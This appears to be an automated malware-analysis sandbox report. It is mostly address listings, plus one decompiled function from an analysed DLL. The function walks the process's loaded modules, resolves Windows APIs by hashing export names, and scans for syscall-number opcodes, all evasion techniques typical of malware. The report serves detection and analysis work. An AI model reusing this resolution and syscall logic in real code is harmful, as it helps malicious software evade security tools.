                                                                                                        0x6e489882
                                                                                                        0x6e489892
                                                                                                        0x6e4898cf
                                                                                                        0x6e4898d3
                                                                                                        0x6e4898da
                                                                                                        0x6e4898e0
                                                                                                        0x6e489894
                                                                                                        0x6e489897
                                                                                                        0x6e4898b7
                                                                                                        0x6e4898bb
                                                                                                        0x6e4898c2
                                                                                                        0x6e4898c9
                                                                                                        0x6e489899
                                                                                                        0x6e48989c
                                                                                                        0x6e48989e
                                                                                                        0x6e4898a2
                                                                                                        0x6e4898ac
                                                                                                        0x6e4898b2
                                                                                                        0x6e4898b2
                                                                                                        0x6e48989c
                                                                                                        0x6e489897
                                                                                                        0x6e4898e7
                                                                                                        0x6e4898e7
                                                                                                        0x6e489900
                                                                                                        0x6e489900
                                                                                                        0x6e489906
                                                                                                        0x6e48990b
                                                                                                        0x6e489965
                                                                                                        0x6e48996a
                                                                                                        0x6e4899a9
                                                                                                        0x6e4899ae
                                                                                                        0x6e4899b0
                                                                                                        0x6e4899b4
                                                                                                        0x6e4899b7
                                                                                                        0x6e4899ba
                                                                                                        0x6e4899bc
                                                                                                        0x6e4899bd
                                                                                                        0x6e4899bd
                                                                                                        0x6e4899c2
                                                                                                        0x6e4899e0
                                                                                                        0x6e4899e2
                                                                                                        0x6e4899e6
                                                                                                        0x6e4899ec
                                                                                                        0x6e4899ef
                                                                                                        0x6e4899f1
                                                                                                        0x6e4899f2
                                                                                                        0x6e4899f2
                                                                                                        0x00000000
                                                                                                        0x6e4899c4
                                                                                                        0x6e4899c4
                                                                                                        0x6e4899c4
                                                                                                        0x6e4899c8
                                                                                                        0x6e4899ce
                                                                                                        0x6e4899d1
                                                                                                        0x6e4899d3
                                                                                                        0x6e4899d6
                                                                                                        0x6e4899f5
                                                                                                        0x6e4899f5
                                                                                                        0x6e4899fc
                                                                                                        0x6e489a16
                                                                                                        0x6e4899fe
                                                                                                        0x6e4899fe
                                                                                                        0x6e489a0a
                                                                                                        0x6e489a0b
                                                                                                        0x6e489a0e
                                                                                                        0x6e489a0e
                                                                                                        0x6e489a24
                                                                                                        0x6e489a24
                                                                                                        0x6e4899c2
                                                                                                        0x6e48996f
                                                                                                        0x6e48997d
                                                                                                        0x6e489995
                                                                                                        0x6e489999
                                                                                                        0x6e48999c
                                                                                                        0x6e4899a2
                                                                                                        0x6e4899a6
                                                                                                        0x6e4899a6
                                                                                                        0x00000000
                                                                                                        0x6e4899a6
                                                                                                        0x6e48997f
                                                                                                        0x6e489983
                                                                                                        0x6e489989
                                                                                                        0x6e489989
                                                                                                        0x6e48998f
                                                                                                        0x00000000
                                                                                                        0x6e48998f
                                                                                                        0x6e489971
                                                                                                        0x6e489975
                                                                                                        0x00000000
                                                                                                        0x6e489975
                                                                                                        0x6e48990f
                                                                                                        0x6e48993b
                                                                                                        0x6e489953
                                                                                                        0x6e489957
                                                                                                        0x6e48995a
                                                                                                        0x6e48995d
                                                                                                        0x6e48995f
                                                                                                        0x6e489962
                                                                                                        0x6e48993d
                                                                                                        0x6e48993d
                                                                                                        0x6e489941
                                                                                                        0x6e489944
                                                                                                        0x6e489947
                                                                                                        0x6e48994a
                                                                                                        0x6e48994d
                                                                                                        0x6e48994d
                                                                                                        0x00000000
                                                                                                        0x6e48993b
                                                                                                        0x6e489915
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e48991b
                                                                                                        0x6e48991f
                                                                                                        0x6e489925
                                                                                                        0x6e489928
                                                                                                        0x6e48992b
                                                                                                        0x6e48992e
                                                                                                        0x00000000
                                                                                                        0x6e48992e
                                                                                                        0x6e4897a6
                                                                                                        0x6e4897aa
                                                                                                        0x6e4897b0
                                                                                                        0x00000000
                                                                                                        0x6e4897b0
                                                                                                        0x6e4896e8
                                                                                                        0x6e4896fa
                                                                                                        0x6e4896ff
                                                                                                        0x6e48976a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e489771
                                                                                                        0x6e489797
                                                                                                        0x6e48979b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e48977a
                                                                                                        0x6e48977f
                                                                                                        0x6e489793
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e489795
                                                                                                        0x6e489786
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e48978b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e48978d
                                                                                                        0x00000000
                                                                                                        0x6e489771
                                                                                                        0x6e489701
                                                                                                        0x6e48970b
                                                                                                        0x6e48971c
                                                                                                        0x6e48971f
                                                                                                        0x6e489722
                                                                                                        0x6e489728
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e48972e
                                                                                                        0x6e48972e
                                                                                                        0x6e48972e
                                                                                                        0x6e489735
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e489737
                                                                                                        0x6e48973a
                                                                                                        0x6e489740
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e489742
                                                                                                        0x6e489744
                                                                                                        0x6e48974d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e489761
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e489763
                                                                                                        0x6e4896ef
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4896f5
                                                                                                        0x6e489689
                                                                                                        0x6e4896b8
                                                                                                        0x6e4896b9
                                                                                                        0x6e4896c2
                                                                                                        0x00000000
                                                                                                        0x6e4896d3
                                                                                                        0x00000000
                                                                                                        0x6e4896d3
                                                                                                        0x6e489690
                                                                                                        0x6e489693
                                                                                                        0x6e4896a6
                                                                                                        0x6e4896a7
                                                                                                        0x6e4896ab
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e489693
                                                                                                        0x6e489689
                                                                                                        0x6e489615
                                                                                                        0x6e489672
                                                                                                        0x6e489676
                                                                                                        0x6e48967c
                                                                                                        0x00000000
                                                                                                        0x6e48967c
                                                                                                        0x6e489617
                                                                                                        0x6e48961b
                                                                                                        0x6e489628
                                                                                                        0x6e48962c
                                                                                                        0x6e489642
                                                                                                        0x6e48964a
                                                                                                        0x6e48962e
                                                                                                        0x6e489630
                                                                                                        0x6e48963a
                                                                                                        0x6e48963a
                                                                                                        0x6e489650
                                                                                                        0x6e489659
                                                                                                        0x6e489670
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e489670
                                                                                                        0x6e48965b
                                                                                                        0x6e48965b
                                                                                                        0x00000000
                                                                                                        0x6e489650

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp Download File
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        • Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
                                                                                                        • Instruction ID: c1c6277af1538eabc44da605f2fddd538651f58f9ffa02dda2f5d95715144943
                                                                                                        • Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
                                                                                                        • Instruction Fuzzy Hash: 54228031408B96CBD715CE65C49176BBBE0BF86300F00886EEAE957391D376D985CB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 6E48143C, Relevance: .6, Instructions: 572COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E6E48143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6E480304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6e48d208 == 0 ||  *0x6e48d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6E484FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6e48d2f0 |  *0x6e48d2f1;
									if(( *0x6e48d2f0 |  *0x6e48d2f1) == 0) {
										_t525 =  *0x6e48d208; // 0x3091340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6e48d2f0 = 1;
											_t526 = E6E48361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6E481C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6e48d208 = _t526;
											 *0x6e48d2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6E48361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6E481C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6E47DFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6E47DFC0(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6e48d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6e48d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6E47E8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6E48306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6e48d2e4 = 1;
					E6E47F584( &(_t535[0x38]), 0);
					E6E47F584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6E47F4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6E48306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6E47F828( &(_t535[0xc]), E6E47F4CC( &(_t535[8])) + 0x14);
								_t369 = E6E47F4BC( &(_t535[0xc]), E6E47F4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6E47F654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6E47F584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6E47F654( &(_t535[8]));
							E6E47F654( &(_t535[0x164]));
							E6E47F584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6E47F584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6E481D34(0x60a28c5c);
							_t290 = E6E4812EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6E481C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6E47D014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6E485CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6E485D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6E488E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6E47F654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6E47BB44( &(_t535[0x110]));
							}
							E6E47CFDC( &(_t535[0x104]));
							E6E47CFDC(_t518);
							E6E47CFDC( &(_t535[0x15c]));
							E6E47CFDC( &(_t535[0x154]));
							E6E4890EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6E47F618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6E4890B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6E47F4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6E47F4CC( &(_t535[0x44]));
								_t519 =  *(0x6e48bd40 + _t381 * 4);
								_t531 = E6E48907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6E4887E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6E47F4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6E47F4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6E47F4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6E47F828( &(_t535[0x20]), E6E47F4CC( &(_t535[0x1c])) + 8);
										E6E47F4BC( &(_t535[0x20]), E6E47F4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6E48317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6E47F828( &(_t535[0x48]), _t535[0x70]);
									E6E48317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6E47F840( &(_t535[0x44]), _t563);
									E6E47F840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6E48913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6E489104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6E47F654( &(_t535[0x144]));
									E6E47F654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6e48d2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6E47F654( &(_t535[0x11c]));
							E6E488E68(_t381,  &(_t535[0xd8]));
							E6E47F654( &(_t535[0x1c]));
							E6E47F654( &(_t535[0x44]));
							E6E47F654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6E47F4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6E47F828( &(_t535[0x38]), E6E47F4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6E47F4BC( &(_t535[0x38]), E6E47F4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6E47F4BC( &(_t535[0xc]), _t62);
						_t455 = E6E47F4BC( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}








































































                                                                                                        0x6e481448
                                                                                                        0x6e48144f
                                                                                                        0x6e481452
                                                                                                        0x6e481459
                                                                                                        0x6e481bdb
                                                                                                        0x6e481bdb
                                                                                                        0x6e48145f
                                                                                                        0x6e48146a
                                                                                                        0x6e4819a9
                                                                                                        0x6e4819ad
                                                                                                        0x00000000
                                                                                                        0x6e481c2c
                                                                                                        0x6e4819b3
                                                                                                        0x6e4819b6
                                                                                                        0x6e4819b9
                                                                                                        0x6e4819c3
                                                                                                        0x6e4819d2
                                                                                                        0x6e4819d4
                                                                                                        0x6e4819db
                                                                                                        0x6e481bc5
                                                                                                        0x6e481bc7
                                                                                                        0x6e481bca
                                                                                                        0x6e481bce
                                                                                                        0x00000000
                                                                                                        0x6e481bce
                                                                                                        0x6e4819ea
                                                                                                        0x6e4819f5
                                                                                                        0x6e4819fc
                                                                                                        0x6e4819ff
                                                                                                        0x6e481a01
                                                                                                        0x6e481a04
                                                                                                        0x6e481a07
                                                                                                        0x6e481a0d
                                                                                                        0x6e481a1b
                                                                                                        0x6e481a2b
                                                                                                        0x6e481a50
                                                                                                        0x6e481a61
                                                                                                        0x6e481a64
                                                                                                        0x6e481a66
                                                                                                        0x6e481aca
                                                                                                        0x6e481acd
                                                                                                        0x6e481acd
                                                                                                        0x6e481acf
                                                                                                        0x6e481ad2
                                                                                                        0x6e481ad6
                                                                                                        0x6e481ad6
                                                                                                        0x6e481ada
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e481ae7
                                                                                                        0x6e481aed
                                                                                                        0x6e481b21
                                                                                                        0x6e481b27
                                                                                                        0x6e481b29
                                                                                                        0x6e481bf8
                                                                                                        0x6e481c00
                                                                                                        0x6e481c03
                                                                                                        0x6e481c05
                                                                                                        0x6e481c1c
                                                                                                        0x6e481c1c
                                                                                                        0x6e481c07
                                                                                                        0x6e481c0b
                                                                                                        0x6e481c10
                                                                                                        0x6e481c10
                                                                                                        0x6e481c1e
                                                                                                        0x6e481c24
                                                                                                        0x6e481b43
                                                                                                        0x6e481b43
                                                                                                        0x6e481b45
                                                                                                        0x6e481b45
                                                                                                        0x6e481b47
                                                                                                        0x6e481b47
                                                                                                        0x6e481b4c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e481b4e
                                                                                                        0x6e481b4f
                                                                                                        0x6e481b52
                                                                                                        0x6e481b55
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e481b61
                                                                                                        0x6e481b64
                                                                                                        0x6e481b66
                                                                                                        0x6e481b7d
                                                                                                        0x6e481b7d
                                                                                                        0x6e481b68
                                                                                                        0x6e481b6c
                                                                                                        0x6e481b71
                                                                                                        0x6e481b71
                                                                                                        0x6e481b8a
                                                                                                        0x6e481b8d
                                                                                                        0x6e481b96
                                                                                                        0x6e481b99
                                                                                                        0x6e481bbc
                                                                                                        0x6e481bc0
                                                                                                        0x00000000
                                                                                                        0x6e481bc0
                                                                                                        0x6e481ba1
                                                                                                        0x6e481ba1
                                                                                                        0x6e481bad
                                                                                                        0x6e481bb0
                                                                                                        0x6e481bb9
                                                                                                        0x00000000
                                                                                                        0x6e481bb9
                                                                                                        0x6e481b2f
                                                                                                        0x6e481b3f
                                                                                                        0x6e481b3f
                                                                                                        0x6e481b41
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e481b37
                                                                                                        0x6e481b39
                                                                                                        0x6e481b39
                                                                                                        0x00000000
                                                                                                        0x6e481b3f
                                                                                                        0x6e481aef
                                                                                                        0x6e481af7
                                                                                                        0x6e481b17
                                                                                                        0x6e481af9
                                                                                                        0x6e481af9
                                                                                                        0x6e481b01
                                                                                                        0x6e481b0a
                                                                                                        0x6e481b0a
                                                                                                        0x6e481b01
                                                                                                        0x00000000
                                                                                                        0x6e481af7
                                                                                                        0x6e481a68
                                                                                                        0x6e481a6f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e481a7c
                                                                                                        0x6e481a82
                                                                                                        0x6e481a87
                                                                                                        0x6e481a8e
                                                                                                        0x6e481a92
                                                                                                        0x6e481aa7
                                                                                                        0x6e481aa9
                                                                                                        0x6e481aab
                                                                                                        0x6e481ab1
                                                                                                        0x6e481abf
                                                                                                        0x6e481abf
                                                                                                        0x6e481ac5
                                                                                                        0x00000000
                                                                                                        0x6e481ac5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e481a0f
                                                                                                        0x6e481a0f
                                                                                                        0x6e481a0f
                                                                                                        0x6e481a10
                                                                                                        0x6e481a13
                                                                                                        0x6e481a17
                                                                                                        0x00000000
                                                                                                        0x6e481a2d
                                                                                                        0x6e481a30
                                                                                                        0x6e481a33
                                                                                                        0x6e481a3c
                                                                                                        0x6e481a3f
                                                                                                        0x6e481a40
                                                                                                        0x6e481a42
                                                                                                        0x00000000
                                                                                                        0x6e48147d
                                                                                                        0x6e48147f
                                                                                                        0x6e481484
                                                                                                        0x6e48148f
                                                                                                        0x6e48149d
                                                                                                        0x6e4814b0
                                                                                                        0x6e4814bd
                                                                                                        0x6e4814c6
                                                                                                        0x6e4814ca
                                                                                                        0x6e4814ce
                                                                                                        0x6e481516
                                                                                                        0x6e481516
                                                                                                        0x6e481518
                                                                                                        0x6e48151f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e481538
                                                                                                        0x6e481540
                                                                                                        0x6e481544
                                                                                                        0x6e481559
                                                                                                        0x6e48155d
                                                                                                        0x6e481561
                                                                                                        0x6e48156a
                                                                                                        0x6e481570
                                                                                                        0x6e481573
                                                                                                        0x6e481577
                                                                                                        0x6e48157f
                                                                                                        0x6e481581
                                                                                                        0x6e481585
                                                                                                        0x6e48158c
                                                                                                        0x6e481595
                                                                                                        0x6e481595
                                                                                                        0x6e481599
                                                                                                        0x6e4815ae
                                                                                                        0x6e4815c4
                                                                                                        0x6e4815d1
                                                                                                        0x6e4815d2
                                                                                                        0x6e4815d2
                                                                                                        0x6e4815d4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e48158e
                                                                                                        0x6e48158e
                                                                                                        0x6e48158e
                                                                                                        0x6e48158f
                                                                                                        0x6e481590
                                                                                                        0x00000000
                                                                                                        0x6e48158e
                                                                                                        0x6e481553
                                                                                                        0x6e481557
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4815d8
                                                                                                        0x6e4815d8
                                                                                                        0x6e4815d9
                                                                                                        0x6e4815dc
